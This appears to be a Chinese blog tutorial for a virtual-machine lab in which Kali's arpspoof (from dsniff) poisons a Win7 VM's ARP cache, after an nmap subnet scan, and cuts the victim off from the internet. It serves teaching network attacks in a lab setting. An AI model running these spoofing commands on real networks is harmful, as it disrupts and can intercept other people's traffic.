(五)kali-ARP攻击实验(基于虚拟机实现)

实验准备:

  1. kail虚拟机一台
  2. win7虚拟机一台
  3. win10主机

实验原理:

实验步骤:

  1. 开启kali虚拟机,打开终端,查看网络记住自己的网卡名和IP
    可以知道kali的IP为192.168.109.129网卡名为eth0
    终端命令:
ifconfig

(五)kali-ARP攻击实验(基于虚拟机实现)
2. 扫描当前IP子段的网络
终端命令:

nmap -sP 192.168.109.0/24

(五)kali-ARP攻击实验(基于虚拟机实现)
4. 打开win7虚拟机,验证网关和IP
可以知道网关为192.168.109.2,IP为192.168.109.131
终端命令:

ipconfig

(五)kali-ARP攻击实验(基于虚拟机实现)
5. 安装arpspoof工具,前提是自己的网络支持,国外的话可以正常下载,国内就需要使用镜像,具体请参考(二)2020kali换源
终端命令:

apt-get install dsniff

(五)kali-ARP攻击实验(基于虚拟机实现)

  1. 攻击前验证win7可以正常连接互联网
    (五)kali-ARP攻击实验(基于虚拟机实现)

  2. 使用工具进行攻击,
    终端命令:-i 后为kali选择攻击的网卡,-t 后两个IP分别是目标主机的IP和网关

arpspoof -i eth0 -t 192.168.109.131 192.168.109.2
  1. win7验证
    (五)kali-ARP攻击实验(基于虚拟机实现)

  2. Ctrl+Z结束,win7网络恢复正常
    (五)kali-ARP攻击实验(基于虚拟机实现)

上一篇:HCIP2--路由器、交换机的转发原理


下一篇:计算机网络【最终版】